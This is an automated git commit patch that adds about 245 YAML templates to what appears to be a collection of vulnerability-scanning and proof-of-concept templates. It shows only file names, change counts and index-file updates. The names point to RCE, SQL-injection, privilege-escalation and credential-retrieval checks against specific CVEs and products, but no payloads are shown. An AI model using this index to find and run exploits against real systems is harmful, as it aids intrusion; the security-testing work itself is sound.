From 9eb53f8c30a1239dee4a95f1b932afbfe8d4abeb Mon Sep 17 00:00:00 2001 
From: GitHub Action Date: Tue, 29 Oct 2024 12:42:36 +0000 Subject: [PATCH] 20241029 --- date.txt | 2 +- poc.txt | 242 + poc/auth/credential-guard-disabled.yaml | 38 + poc/auth/disable-empty-password.yaml | 24 + poc/auth/disable-root-login.yaml | 23 + poc/auth/get-stored-credentials-cmdkey.yaml | 27 + poc/auth/hide-last-login-information.yaml | 24 + poc/auth/http-preprocessor.yaml | 17 + .../hyperv-enhanced-session-mode-enabled.yaml | 33 + ...limit-maximum-authentication-attempts.yaml | 23 + .../lm-ntlmv1-authentication-enabled.yaml | 32 + poc/auth/max-password-age-too-high.yaml | 30 + poc/auth/minimum-password-age-zero.yaml | 36 + poc/auth/null-session-allowed.yaml | 32 + poc/auth/password-complexity-disabled.yaml | 32 + poc/auth/password-history-size-low.yaml | 32 + .../password-reset-lock-screen-enabled.yaml | 32 + poc/auth/plaintext-passwords-in-memory.yaml | 32 + poc/auth/secret-manager-inuse.yaml | 38 + poc/auth/secret-rotation-enabled.yaml | 58 + poc/auth/secret-rotation-interval.yaml | 58 + poc/auth/secrets-patterns-pii.yaml | 812 +++ poc/auth/secrets-patterns-rules.yaml | 4502 +++++++++++++++++ poc/auth/ssh-key-auth-required.yaml | 23 + poc/auth/webui-login.yaml | 25 + poc/aws/cloudfront-compress-object.yaml | 60 + poc/aws/cloudfront-custom-certificates.yaml | 60 + poc/aws/cloudfront-geo-restriction.yaml | 60 + poc/aws/cloudfront-insecure-protocol.yaml | 60 + poc/aws/cloudfront-integrated-waf.yaml | 66 + poc/aws/cloudfront-logging-disabled.yaml | 60 + poc/aws/cloudfront-origin-shield.yaml | 60 + poc/aws/cloudfront-security-policy.yaml | 64 + poc/aws/cloudfront-traffic-unencrypted.yaml | 60 + poc/aws/cloudfront-viewer-policy.yaml | 60 + poc/config/device-guard-not-configured.yaml | 35 + .../k8s-liveness-probe-not-configured.yaml | 48 + poc/cve/CVE-2014-0160.yaml | 137 + poc/cve/CVE-2016-8735.yaml | 87 + poc/cve/CVE-2017-7525.yaml | 63 + poc/cve/CVE-2019-1003000.yaml | 99 + poc/cve/CVE-2020-15906.yaml | 150 + poc/cve/CVE-2023-27294.yaml | 64 + 
poc/cve/CVE-2023-33533.yaml | 65 + poc/cve/CVE-2023-34992.yaml | 50 + poc/cve/CVE-2023-43494.yaml | 42 + poc/cve/CVE-2023-46214.yaml | 194 + poc/cve/CVE-2023-49799.yaml | 60 + ...0000-694d94278b136ae533a9c85fde05b877.yaml | 59 + ...0008-4e1fc9966938dc414b06dd519e73122b.yaml | 59 + ...0048-b98a29a036ced771c9bb009b9895710a.yaml | 59 + ...0181-21fdb15695068521f367ac81bba91927.yaml | 59 + ...0184-7530619e6a2cefd5da69227ca41f6b35.yaml | 59 + ...0185-8035ec074be079e96120312271a0f33c.yaml | 59 + ...0226-352293729ca01a23dbb48ef5e92fcf29.yaml | 59 + ...0227-cbeff506f736d2c0744bf4b540fe5582.yaml | 59 + ...0233-3e88623b9f3ddb06e9ba90e1e3bb7a8a.yaml | 59 + ...0266-c7464e0e6f14d3d02fbbef631b0fa0d8.yaml | 59 + ...0312-50ebf94b7cedccb9e13dff934ff93b48.yaml | 59 + ...0360-45e78583db6193210a4d94e69731df68.yaml | 59 + ...0436-a86e6c3894cf7d8dfd30fe33efb608fb.yaml | 59 + ...0437-71d2ceb29cd432d59d731bb15deb7062.yaml | 59 + poc/cve/CVE-2024-21520.yaml | 45 + poc/cve/CVE-2024-22120.yaml | 53 + poc/cve/CVE-2024-23108.yaml | 50 + poc/cve/CVE-2024-27130.yaml | 49 + poc/cve/CVE-2024-2928.yaml | 69 + poc/cve/CVE-2024-32877.yaml | 38 + poc/cve/CVE-2024-38653.yaml | 45 + poc/cve/CVE-2024-41468.yaml | 41 + poc/cve/CVE-2024-42640.yaml | 69 + poc/cve/CVE-2024-4320.yaml | 53 + ...4047-1273fc886c0e5f1dea85089a551277e9.yaml | 59 + poc/cve/CVE-2024-45309.yaml | 51 + poc/cve/CVE-2024-4841.yaml | 60 + poc/cve/CVE-2024-5334.yaml | 48 + poc/cve/CVE-2024-6049.yaml | 54 + ...7985-53ab665dcdb6d56c0c0d45bebfc0b937.yaml | 59 + poc/cve/CVE-2024-9162.yaml | 59 + poc/cve/CVE-2024-9264.yaml | 92 + ...9376-dbbbe5df90e59d17c7c7d8c8dd600952.yaml | 59 + ...9438-35e80a39f9c5a9c6a465bf9aae910e35.yaml | 59 + ...9505-bbf8db303ac965c608b6fcb6b5637bca.yaml | 59 + ...9629-f373fd300647fa035c1852f606cc1e3e.yaml | 59 + ...9933-2395a386aa24a6b2e0af0d7ebb971352.yaml | 59 + "poc/cve/CVE-2024\342\200\22324142.yaml" | 26 + poc/cve/cve-2024-6966.yaml | 42 + poc/default/change-default-port.yaml | 23 + 
poc/default/k8s-default-namespace-used.yaml | 49 + poc/detect/cyberpanel-detect.yaml | 35 + poc/detect/docker-ports-detection.yaml | 19 + poc/detect/flexmls-detect.yaml | 47 + poc/detect/kaseya-detect.yaml | 27 + poc/detect/localai-detect.yaml | 32 + poc/detect/pghero-detect.yaml | 27 + poc/docker/docker-ports-detection.yaml | 19 + poc/docker/k8s-containers-share-host-ipc.yaml | 48 + poc/docker/k8s-privileged-container.yaml | 53 + poc/docker/k8s-root-container-admission.yaml | 49 + poc/exposed/appspec-yml-disclosure.yaml | 20 +- .../http-matcher-extractor-dy-extractor.yaml | 36 + poc/ftp/allow-unencrypted-ftp.yaml | 32 + poc/ftp/ftp-service-running.yaml | 32 + poc/fuzz/fuzz-headless.yaml | 31 + poc/header/headless-header-status-test.yaml | 24 + poc/http/http-get.yaml | 15 + .../http-matcher-extractor-dy-extractor.yaml | 36 + poc/http/http-preprocessor.yaml | 17 + poc/http/multi-http-var-sharing.yaml | 36 + poc/http/net-https-timeout.yaml | 25 + poc/http/net-https.yaml | 20 + .../nodejs-framework-exceptions.yaml | 32 + ...lert-e7666c2e9949971a8cf15a29d904cf8b.yaml | 59 + poc/nodejs/nodejs-framework-exceptions.yaml | 32 + poc/other/a.yaml | 17 + poc/other/aaaa.yaml | 17 + ...rter-dd5a0e0390a10aa5d721daf54dd2417d.yaml | 59 + poc/other/allow-untrusted-certificates.yaml | 29 + .../anonymous-sam-enumeration-enabled.yaml | 32 + .../anonymous-sid-enumeration-enabled.yaml | 32 + ...odes-967c5b2184718a3fda197f1a2ade7c59.yaml | 59 + poc/other/aspnet-framework-exceptions.yaml | 24 + poc/other/audit-logging-disabled.yaml | 37 + poc/other/audit-logs-not-archived.yaml | 29 + poc/other/auto-logon-enabled.yaml | 32 + .../automatic-windows-updates-disabled.yaml | 32 + .../autoplay-removable-media-enabled.yaml | 32 + poc/other/autorun-scripts-startup-folder.yaml | 33 + ...sion-7d8fb493786dead17199a99ea743ec55.yaml | 59 + poc/other/cname.yaml | 18 + poc/other/code-template-1.yaml | 22 + poc/other/code-template-2.yaml | 21 + poc/other/code-value-share-workflow.yaml | 12 + 
poc/other/complex-conditions.yaml | 23 + poc/other/conditional-flow.yaml | 23 + poc/other/disable-path-automerge.yaml | 21 + poc/other/display-last-username-enabled.yaml | 32 + poc/other/dns-ns-probe.yaml | 43 + .../download-unsigned-activex-allowed.yaml | 32 + poc/other/evaluate-variables.yaml | 30 + ...ntor-a72af3b32854656a4c8be56907be5fd5.yaml | 59 + poc/other/exported-response-vars.yaml | 26 + ...izer-24cbdfd1a4d8ff126da4bd032282a39c.yaml | 59 + poc/other/flow-hide-matcher.yaml | 29 + poc/other/get-hotfix.yaml | 27 + poc/other/guest-account-enabled.yaml | 32 + poc/other/headless-1.yaml | 15 + poc/other/headless-self-contained.yaml | 20 + poc/other/headless-waitevent.yaml | 24 + poc/other/idle-timeout-Interval.yaml | 26 + poc/other/insecure-cipher-suites-enabled.yaml | 33 + poc/other/interactsh-requests-mc-and.yaml | 27 + poc/other/iterate-one-value-flow.yaml | 37 + .../k8s-allow-privilege-escalation-set.yaml | 51 + poc/other/k8s-cpu-limits-not-set.yaml | 50 + poc/other/k8s-cpu-requests-not-set.yaml | 50 + .../k8s-host-network-namespace-shared.yaml | 48 + poc/other/k8s-host-pid-namespace-sharing.yaml | 48 + poc/other/k8s-host-ports-check.yaml | 51 + poc/other/k8s-image-pull-policy-always.yaml | 49 + poc/other/k8s-image-tag-not-fixed.yaml | 53 + poc/other/k8s-memory-limits-not-set.yaml | 48 + poc/other/k8s-memory-requests-not-set.yaml | 48 + .../k8s-minimize-added-capabilities.yaml | 52 + poc/other/k8s-netpol-egress-rules.yaml | 48 + poc/other/k8s-netpol-namespace.yaml | 49 + poc/other/k8s-network-ingress-rules.yaml | 49 + poc/other/k8s-readiness-probe-not-set.yaml | 49 + poc/other/k8s-readonly-fs.yaml | 48 + poc/other/k8s-readonly-rootfs.yaml | 51 + poc/other/k8s-root-user-id.yaml | 50 + poc/other/k8s-seccomp-profile-set.yaml | 54 + ...plus-36c5b8e23edc73cc63396a6195be2274.yaml | 59 + ...stem-2928d4688fb415c9cbca95396899c99f.yaml | 59 + ...stem-91dd199724129d4d681d2379143caddc.yaml | 59 + poc/other/llmnr-disabled.yaml | 33 + 
poc/other/lm-hash-storage-enabled.yaml | 32 + poc/other/match-3.yaml | 16 + poc/other/matcher-status.yaml | 40 + poc/other/matcher-with-nested-and.yaml | 18 + poc/other/multi-request.yaml | 26 + .../multimatch-value-share-template.yaml | 23 + .../multimatch-value-share-workflow.yaml | 21 + poc/other/multiproto.yaml | 30 + .../multiprotocol-value-share-template.yaml | 22 + poc/other/multiprotodynamic.yaml | 29 + poc/other/multiprotowithprefix.yaml | 26 + poc/other/net-multi-step.yaml | 32 + poc/other/netbios-disabled.yaml | 33 + .../network-discovery-public-enabled.yaml | 32 + poc/other/network-port.yaml | 21 + ...lite-e4e61a63407c312b8137011c7ea6ce20.yaml | 59 + poc/other/ns.yaml | 18 + poc/other/nuclei-flow-dns-prefix.yaml | 40 + ...fier-1f96a6ee00d3cc511b2ed232d5c404c1.yaml | 59 + ...lite-1f96a6ee00d3cc511b2ed232d5c404c1.yaml | 59 + ...ntor-90c620c52803efe7bafe8790411d6928.yaml | 59 + poc/other/privesc-agetty.yaml | 41 + poc/other/ps1-snippet.yaml | 28 + poc/other/py-file.yaml | 21 + poc/other/py-interactsh.yaml | 29 + poc/other/py-nosig.yaml | 21 + poc/other/py-snippet.yaml | 23 + poc/other/quivr-panel.yaml | 27 + poc/other/raw-path-single-slash.yaml | 13 + poc/other/raw-unsafe-path-single-slash.yaml | 15 + poc/other/same-address.yaml | 29 + ...seur-710adeba52f1b42ddecb78da2e1d3776.yaml | 59 + poc/other/sf2-profiler-exploit.yaml | 44 + poc/other/show-version-warning.yaml | 18 + poc/other/sns-public-subscribe-access.yaml | 70 + poc/other/stack-notification-disabled.yaml | 58 + poc/other/stack-policy-not-inuse.yaml | 60 + poc/other/stack-termination-disabled.yaml | 58 + ...tion-772ed0ffd8d710c91969af2e2067e767.yaml | 59 + ...tion-49702b84305a29c70a813e1c6c4c5f8d.yaml | 59 + poc/other/tenda-fh451-stack-overflow.yaml | 36 + poc/other/txt.yaml | 18 + poc/other/unquoted-service-pathcheck.yaml | 52 + poc/other/unsigned.yaml | 21 + poc/remote_code_execution/cyberpanel-rce.yaml | 58 + ...0181-21fdb15695068521f367ac81bba91927.yaml | 59 + 
...0226-352293729ca01a23dbb48ef5e92fcf29.yaml | 59 + ...0233-3e88623b9f3ddb06e9ba90e1e3bb7a8a.yaml | 59 + ...0360-45e78583db6193210a4d94e69731df68.yaml | 59 + ...7985-53ab665dcdb6d56c0c0d45bebfc0b937.yaml | 59 + ...9376-dbbbe5df90e59d17c7c7d8c8dd600952.yaml | 59 + ...9505-bbf8db303ac965c608b6fcb6b5637bca.yaml | 59 + ...gram-92fb3b1b9f8249665fe2a2df5db85b7a.yaml | 59 + ...dons-e750f1bb05d811fe0e3f213b39e81dbd.yaml | 59 + .../royal-event-management-system-sqli.yaml | 67 + poc/sql/xhibiter-nft-sqli.yaml | 52 + .../royal-event-management-system-sqli.yaml | 67 + poc/sql_injection/xhibiter-nft-sqli.yaml | 52 + poc/ssh/disable-ssh-forwarding.yaml | 24 + poc/ssh/disable-ssh-protocol-1.yaml | 24 + poc/ssh/enable-ssh-privilege-separation.yaml | 24 + poc/ssh/limit-ssh-group.yaml | 24 + poc/ssh/limit-ssh-users-access.yaml | 24 + poc/ssh/ssh-audit.yaml | 80 + poc/ssh/ssh-ip-whitelist.yaml | 23 + poc/ssh/ssh-key-auth-required.yaml | 23 + poc/web/webui-login.yaml | 25 + ...ages-504d2223497cf2c2514151c40b405179.yaml | 59 + ...ages-bd63fbb32b56e3848c8cdcc2c3f2fd2f.yaml | 59 + 245 files changed, 16125 insertions(+), 4 deletions(-) create mode 100644 poc/auth/credential-guard-disabled.yaml create mode 100644 poc/auth/disable-empty-password.yaml create mode 100644 poc/auth/disable-root-login.yaml create mode 100644 poc/auth/get-stored-credentials-cmdkey.yaml create mode 100644 poc/auth/hide-last-login-information.yaml create mode 100644 poc/auth/http-preprocessor.yaml create mode 100644 poc/auth/hyperv-enhanced-session-mode-enabled.yaml create mode 100644 poc/auth/limit-maximum-authentication-attempts.yaml create mode 100644 poc/auth/lm-ntlmv1-authentication-enabled.yaml create mode 100644 poc/auth/max-password-age-too-high.yaml create mode 100644 poc/auth/minimum-password-age-zero.yaml create mode 100644 poc/auth/null-session-allowed.yaml create mode 100644 poc/auth/password-complexity-disabled.yaml create mode 100644 poc/auth/password-history-size-low.yaml create mode 100644 
poc/auth/password-reset-lock-screen-enabled.yaml create mode 100644 poc/auth/plaintext-passwords-in-memory.yaml create mode 100644 poc/auth/secret-manager-inuse.yaml create mode 100644 poc/auth/secret-rotation-enabled.yaml create mode 100644 poc/auth/secret-rotation-interval.yaml create mode 100644 poc/auth/secrets-patterns-pii.yaml create mode 100644 poc/auth/secrets-patterns-rules.yaml create mode 100644 poc/auth/ssh-key-auth-required.yaml create mode 100644 poc/auth/webui-login.yaml create mode 100644 poc/aws/cloudfront-compress-object.yaml create mode 100644 poc/aws/cloudfront-custom-certificates.yaml create mode 100644 poc/aws/cloudfront-geo-restriction.yaml create mode 100644 poc/aws/cloudfront-insecure-protocol.yaml create mode 100644 poc/aws/cloudfront-integrated-waf.yaml create mode 100644 poc/aws/cloudfront-logging-disabled.yaml create mode 100644 poc/aws/cloudfront-origin-shield.yaml create mode 100644 poc/aws/cloudfront-security-policy.yaml create mode 100644 poc/aws/cloudfront-traffic-unencrypted.yaml create mode 100644 poc/aws/cloudfront-viewer-policy.yaml create mode 100644 poc/config/device-guard-not-configured.yaml create mode 100644 poc/config/k8s-liveness-probe-not-configured.yaml create mode 100644 poc/cve/CVE-2014-0160.yaml create mode 100644 poc/cve/CVE-2016-8735.yaml create mode 100644 poc/cve/CVE-2017-7525.yaml create mode 100644 poc/cve/CVE-2019-1003000.yaml create mode 100644 poc/cve/CVE-2020-15906.yaml create mode 100644 poc/cve/CVE-2023-27294.yaml create mode 100644 poc/cve/CVE-2023-33533.yaml create mode 100644 poc/cve/CVE-2023-34992.yaml create mode 100644 poc/cve/CVE-2023-43494.yaml create mode 100644 poc/cve/CVE-2023-46214.yaml create mode 100644 poc/cve/CVE-2023-49799.yaml create mode 100644 poc/cve/CVE-2024-10000-694d94278b136ae533a9c85fde05b877.yaml create mode 100644 poc/cve/CVE-2024-10008-4e1fc9966938dc414b06dd519e73122b.yaml create mode 100644 poc/cve/CVE-2024-10048-b98a29a036ced771c9bb009b9895710a.yaml create mode 100644 
poc/cve/CVE-2024-10181-21fdb15695068521f367ac81bba91927.yaml create mode 100644 poc/cve/CVE-2024-10184-7530619e6a2cefd5da69227ca41f6b35.yaml create mode 100644 poc/cve/CVE-2024-10185-8035ec074be079e96120312271a0f33c.yaml create mode 100644 poc/cve/CVE-2024-10226-352293729ca01a23dbb48ef5e92fcf29.yaml create mode 100644 poc/cve/CVE-2024-10227-cbeff506f736d2c0744bf4b540fe5582.yaml create mode 100644 poc/cve/CVE-2024-10233-3e88623b9f3ddb06e9ba90e1e3bb7a8a.yaml create mode 100644 poc/cve/CVE-2024-10266-c7464e0e6f14d3d02fbbef631b0fa0d8.yaml create mode 100644 poc/cve/CVE-2024-10312-50ebf94b7cedccb9e13dff934ff93b48.yaml create mode 100644 poc/cve/CVE-2024-10360-45e78583db6193210a4d94e69731df68.yaml create mode 100644 poc/cve/CVE-2024-10436-a86e6c3894cf7d8dfd30fe33efb608fb.yaml create mode 100644 poc/cve/CVE-2024-10437-71d2ceb29cd432d59d731bb15deb7062.yaml create mode 100644 poc/cve/CVE-2024-21520.yaml create mode 100644 poc/cve/CVE-2024-22120.yaml create mode 100644 poc/cve/CVE-2024-23108.yaml create mode 100644 poc/cve/CVE-2024-27130.yaml create mode 100644 poc/cve/CVE-2024-2928.yaml create mode 100644 poc/cve/CVE-2024-32877.yaml create mode 100644 poc/cve/CVE-2024-38653.yaml create mode 100644 poc/cve/CVE-2024-41468.yaml create mode 100644 poc/cve/CVE-2024-42640.yaml create mode 100644 poc/cve/CVE-2024-4320.yaml create mode 100644 poc/cve/CVE-2024-44047-1273fc886c0e5f1dea85089a551277e9.yaml create mode 100644 poc/cve/CVE-2024-45309.yaml create mode 100644 poc/cve/CVE-2024-4841.yaml create mode 100644 poc/cve/CVE-2024-5334.yaml create mode 100644 poc/cve/CVE-2024-6049.yaml create mode 100644 poc/cve/CVE-2024-7985-53ab665dcdb6d56c0c0d45bebfc0b937.yaml create mode 100644 poc/cve/CVE-2024-9162.yaml create mode 100644 poc/cve/CVE-2024-9264.yaml create mode 100644 poc/cve/CVE-2024-9376-dbbbe5df90e59d17c7c7d8c8dd600952.yaml create mode 100644 poc/cve/CVE-2024-9438-35e80a39f9c5a9c6a465bf9aae910e35.yaml create mode 100644 
poc/cve/CVE-2024-9505-bbf8db303ac965c608b6fcb6b5637bca.yaml create mode 100644 poc/cve/CVE-2024-9629-f373fd300647fa035c1852f606cc1e3e.yaml create mode 100644 poc/cve/CVE-2024-9933-2395a386aa24a6b2e0af0d7ebb971352.yaml create mode 100644 "poc/cve/CVE-2024\342\200\22324142.yaml" create mode 100644 poc/cve/cve-2024-6966.yaml create mode 100644 poc/default/change-default-port.yaml create mode 100644 poc/default/k8s-default-namespace-used.yaml create mode 100644 poc/detect/cyberpanel-detect.yaml create mode 100644 poc/detect/docker-ports-detection.yaml create mode 100644 poc/detect/flexmls-detect.yaml create mode 100644 poc/detect/kaseya-detect.yaml create mode 100644 poc/detect/localai-detect.yaml create mode 100644 poc/detect/pghero-detect.yaml create mode 100644 poc/docker/docker-ports-detection.yaml create mode 100644 poc/docker/k8s-containers-share-host-ipc.yaml create mode 100644 poc/docker/k8s-privileged-container.yaml create mode 100644 poc/docker/k8s-root-container-admission.yaml create mode 100644 poc/extract/http-matcher-extractor-dy-extractor.yaml create mode 100644 poc/ftp/allow-unencrypted-ftp.yaml create mode 100644 poc/ftp/ftp-service-running.yaml create mode 100644 poc/fuzz/fuzz-headless.yaml create mode 100644 poc/header/headless-header-status-test.yaml create mode 100644 poc/http/http-get.yaml create mode 100644 poc/http/http-matcher-extractor-dy-extractor.yaml create mode 100644 poc/http/http-preprocessor.yaml create mode 100644 poc/http/multi-http-var-sharing.yaml create mode 100644 poc/http/net-https-timeout.yaml create mode 100644 poc/http/net-https.yaml create mode 100644 poc/javascript/nodejs-framework-exceptions.yaml create mode 100644 poc/microsoft/sms-alert-e7666c2e9949971a8cf15a29d904cf8b.yaml create mode 100644 poc/nodejs/nodejs-framework-exceptions.yaml create mode 100644 poc/other/a.yaml create mode 100644 poc/other/aaaa.yaml create mode 100644 poc/other/affiliate-toolkit-starter-dd5a0e0390a10aa5d721daf54dd2417d.yaml create mode 100644 
poc/other/allow-untrusted-certificates.yaml create mode 100644 poc/other/anonymous-sam-enumeration-enabled.yaml create mode 100644 poc/other/anonymous-sid-enumeration-enabled.yaml create mode 100644 poc/other/arconix-shortcodes-967c5b2184718a3fda197f1a2ade7c59.yaml create mode 100644 poc/other/aspnet-framework-exceptions.yaml create mode 100644 poc/other/audit-logging-disabled.yaml create mode 100644 poc/other/audit-logs-not-archived.yaml create mode 100644 poc/other/auto-logon-enabled.yaml create mode 100644 poc/other/automatic-windows-updates-disabled.yaml create mode 100644 poc/other/autoplay-removable-media-enabled.yaml create mode 100644 poc/other/autorun-scripts-startup-folder.yaml create mode 100644 poc/other/beaver-builder-lite-version-7d8fb493786dead17199a99ea743ec55.yaml create mode 100644 poc/other/cname.yaml create mode 100644 poc/other/code-template-1.yaml create mode 100644 poc/other/code-template-2.yaml create mode 100644 poc/other/code-value-share-workflow.yaml create mode 100644 poc/other/complex-conditions.yaml create mode 100644 poc/other/conditional-flow.yaml create mode 100644 poc/other/disable-path-automerge.yaml create mode 100644 poc/other/display-last-username-enabled.yaml create mode 100644 poc/other/dns-ns-probe.yaml create mode 100644 poc/other/download-unsigned-activex-allowed.yaml create mode 100644 poc/other/evaluate-variables.yaml create mode 100644 poc/other/exclusive-addons-for-elementor-a72af3b32854656a4c8be56907be5fd5.yaml create mode 100644 poc/other/exported-response-vars.yaml create mode 100644 poc/other/fileorganizer-24cbdfd1a4d8ff126da4bd032282a39c.yaml create mode 100644 poc/other/flow-hide-matcher.yaml create mode 100644 poc/other/get-hotfix.yaml create mode 100644 poc/other/guest-account-enabled.yaml create mode 100644 poc/other/headless-1.yaml create mode 100644 poc/other/headless-self-contained.yaml create mode 100644 poc/other/headless-waitevent.yaml create mode 100644 poc/other/idle-timeout-Interval.yaml create mode 
100644 poc/other/insecure-cipher-suites-enabled.yaml create mode 100644 poc/other/interactsh-requests-mc-and.yaml create mode 100644 poc/other/iterate-one-value-flow.yaml create mode 100644 poc/other/k8s-allow-privilege-escalation-set.yaml create mode 100644 poc/other/k8s-cpu-limits-not-set.yaml create mode 100644 poc/other/k8s-cpu-requests-not-set.yaml create mode 100644 poc/other/k8s-host-network-namespace-shared.yaml create mode 100644 poc/other/k8s-host-pid-namespace-sharing.yaml create mode 100644 poc/other/k8s-host-ports-check.yaml create mode 100644 poc/other/k8s-image-pull-policy-always.yaml create mode 100644 poc/other/k8s-image-tag-not-fixed.yaml create mode 100644 poc/other/k8s-memory-limits-not-set.yaml create mode 100644 poc/other/k8s-memory-requests-not-set.yaml create mode 100644 poc/other/k8s-minimize-added-capabilities.yaml create mode 100644 poc/other/k8s-netpol-egress-rules.yaml create mode 100644 poc/other/k8s-netpol-namespace.yaml create mode 100644 poc/other/k8s-network-ingress-rules.yaml create mode 100644 poc/other/k8s-readiness-probe-not-set.yaml create mode 100644 poc/other/k8s-readonly-fs.yaml create mode 100644 poc/other/k8s-readonly-rootfs.yaml create mode 100644 poc/other/k8s-root-user-id.yaml create mode 100644 poc/other/k8s-seccomp-profile-set.yaml create mode 100644 poc/other/kata-plus-36c5b8e23edc73cc63396a6195be2274.yaml create mode 100644 poc/other/learning-management-system-2928d4688fb415c9cbca95396899c99f.yaml create mode 100644 poc/other/learning-management-system-91dd199724129d4d681d2379143caddc.yaml create mode 100644 poc/other/llmnr-disabled.yaml create mode 100644 poc/other/lm-hash-storage-enabled.yaml create mode 100644 poc/other/match-3.yaml create mode 100644 poc/other/matcher-status.yaml create mode 100644 poc/other/matcher-with-nested-and.yaml create mode 100644 poc/other/multi-request.yaml create mode 100644 poc/other/multimatch-value-share-template.yaml create mode 100644 
poc/other/multimatch-value-share-workflow.yaml create mode 100644 poc/other/multiproto.yaml create mode 100644 poc/other/multiprotocol-value-share-template.yaml create mode 100644 poc/other/multiprotodynamic.yaml create mode 100644 poc/other/multiprotowithprefix.yaml create mode 100644 poc/other/net-multi-step.yaml create mode 100644 poc/other/netbios-disabled.yaml create mode 100644 poc/other/network-discovery-public-enabled.yaml create mode 100644 poc/other/network-port.yaml create mode 100644 poc/other/newsletters-lite-e4e61a63407c312b8137011c7ea6ce20.yaml create mode 100644 poc/other/ns.yaml create mode 100644 poc/other/nuclei-flow-dns-prefix.yaml create mode 100644 poc/other/post-status-notifier-1f96a6ee00d3cc511b2ed232d5c404c1.yaml create mode 100644 poc/other/post-status-notifier-lite-1f96a6ee00d3cc511b2ed232d5c404c1.yaml create mode 100644 poc/other/premium-addons-for-elementor-90c620c52803efe7bafe8790411d6928.yaml create mode 100644 poc/other/privesc-agetty.yaml create mode 100644 poc/other/ps1-snippet.yaml create mode 100644 poc/other/py-file.yaml create mode 100644 poc/other/py-interactsh.yaml create mode 100644 poc/other/py-nosig.yaml create mode 100644 poc/other/py-snippet.yaml create mode 100644 poc/other/quivr-panel.yaml create mode 100644 poc/other/raw-path-single-slash.yaml create mode 100644 poc/other/raw-unsafe-path-single-slash.yaml create mode 100644 poc/other/same-address.yaml create mode 100644 poc/other/seur-710adeba52f1b42ddecb78da2e1d3776.yaml create mode 100644 poc/other/sf2-profiler-exploit.yaml create mode 100644 poc/other/show-version-warning.yaml create mode 100644 poc/other/sns-public-subscribe-access.yaml create mode 100644 poc/other/stack-notification-disabled.yaml create mode 100644 poc/other/stack-policy-not-inuse.yaml create mode 100644 poc/other/stack-termination-disabled.yaml create mode 100644 poc/other/streamweasels-kick-integration-772ed0ffd8d710c91969af2e2067e767.yaml create mode 100644 
poc/other/streamweasels-youtube-integration-49702b84305a29c70a813e1c6c4c5f8d.yaml create mode 100644 poc/other/tenda-fh451-stack-overflow.yaml create mode 100644 poc/other/txt.yaml create mode 100644 poc/other/unquoted-service-pathcheck.yaml create mode 100644 poc/other/unsigned.yaml create mode 100644 poc/remote_code_execution/cyberpanel-rce.yaml create mode 100644 poc/sql/CVE-2024-10181-21fdb15695068521f367ac81bba91927.yaml create mode 100644 poc/sql/CVE-2024-10226-352293729ca01a23dbb48ef5e92fcf29.yaml create mode 100644 poc/sql/CVE-2024-10233-3e88623b9f3ddb06e9ba90e1e3bb7a8a.yaml create mode 100644 poc/sql/CVE-2024-10360-45e78583db6193210a4d94e69731df68.yaml create mode 100644 poc/sql/CVE-2024-7985-53ab665dcdb6d56c0c0d45bebfc0b937.yaml create mode 100644 poc/sql/CVE-2024-9376-dbbbe5df90e59d17c7c7d8c8dd600952.yaml create mode 100644 poc/sql/CVE-2024-9505-bbf8db303ac965c608b6fcb6b5637bca.yaml create mode 100644 poc/sql/cf7-telegram-92fb3b1b9f8249665fe2a2df5db85b7a.yaml create mode 100644 poc/sql/move-addons-e750f1bb05d811fe0e3f213b39e81dbd.yaml create mode 100644 poc/sql/royal-event-management-system-sqli.yaml create mode 100644 poc/sql/xhibiter-nft-sqli.yaml create mode 100644 poc/sql_injection/royal-event-management-system-sqli.yaml create mode 100644 poc/sql_injection/xhibiter-nft-sqli.yaml create mode 100644 poc/ssh/disable-ssh-forwarding.yaml create mode 100644 poc/ssh/disable-ssh-protocol-1.yaml create mode 100644 poc/ssh/enable-ssh-privilege-separation.yaml create mode 100644 poc/ssh/limit-ssh-group.yaml create mode 100644 poc/ssh/limit-ssh-users-access.yaml create mode 100644 poc/ssh/ssh-audit.yaml create mode 100644 poc/ssh/ssh-ip-whitelist.yaml create mode 100644 poc/ssh/ssh-key-auth-required.yaml create mode 100644 poc/web/webui-login.yaml create mode 100644 poc/wordpress/wpc-smart-messages-504d2223497cf2c2514151c40b405179.yaml create mode 100644 poc/wordpress/wpc-smart-messages-bd63fbb32b56e3848c8cdcc2c3f2fd2f.yaml 
diff --git a/date.txt b/date.txt
index 0dda5574ec..03377a986a 100644
--- a/date.txt
+++ b/date.txt
@@ -1 +1 @@
-20241028
+20241029
diff --git a/poc.txt b/poc.txt
index 57481eabf8..9cc3ae0552 100644
--- a/poc.txt
+++ b/poc.txt
@@ -2598,6 +2598,7 @@
 ./poc/auth/credential-exposure-1251.yaml
 ./poc/auth/credential-exposure-file.yaml
 ./poc/auth/credential-exposure.yaml
+./poc/auth/credential-guard-disabled.yaml
 ./poc/auth/credentials (copy 1).yaml
 ./poc/auth/credentials-1257.yaml
 ./poc/auth/credentials-1258.yaml
@@ -2770,6 +2771,8 @@
 ./poc/auth/directadmin-login-panel-7001.yaml
 ./poc/auth/directadmin-login-panel.yaml
 ./poc/auth/directum-login.yaml
+./poc/auth/disable-empty-password.yaml
+./poc/auth/disable-root-login.yaml
 ./poc/auth/disable-user-login-e081053d3461091ab36b623cc2522dea.yaml
 ./poc/auth/disable-user-login.yaml
 ./poc/auth/discord-api-token.yaml
@@ -3139,6 +3142,7 @@
 ./poc/auth/geoserver-default-login.yaml
 ./poc/auth/geoserver-login-panel.yaml
 ./poc/auth/get-access-token-json.yaml
+./poc/auth/get-stored-credentials-cmdkey.yaml
 ./poc/auth/git-credentials-7643.yaml
 ./poc/auth/git-credentials-7644.yaml
 ./poc/auth/git-credentials-disclosure-7639.yaml
@@ -3349,6 +3353,7 @@
 ./poc/auth/hidden-api-key-exposure.yaml
 ./poc/auth/hidden-cookie-attributes.yaml
 ./poc/auth/hidden-csrf-token.yaml
+./poc/auth/hide-last-login-information.yaml
 ./poc/auth/hide-login-page-c1c307d2df7d682116006f73d5e737fe.yaml
 ./poc/auth/hide-login-page.yaml
 ./poc/auth/hikvision-camera-management-unauthorized-access-user-list.yaml
@@ -3413,6 +3418,7 @@
 ./poc/auth/http-etcd-unauthenticated-api-data-leak-8056.yaml
 ./poc/auth/http-etcd-unauthenticated-api-data-leak-8057.yaml
 ./poc/auth/http-etcd-unauthenticated-api-data-leak.yaml
+./poc/auth/http-preprocessor.yaml
 ./poc/auth/http-username-password.yaml
 ./poc/auth/httponly-cookie-detect.yaml
 ./poc/auth/huawei-HG532e-default-login.yaml
@@ -3435,6 +3441,7 @@
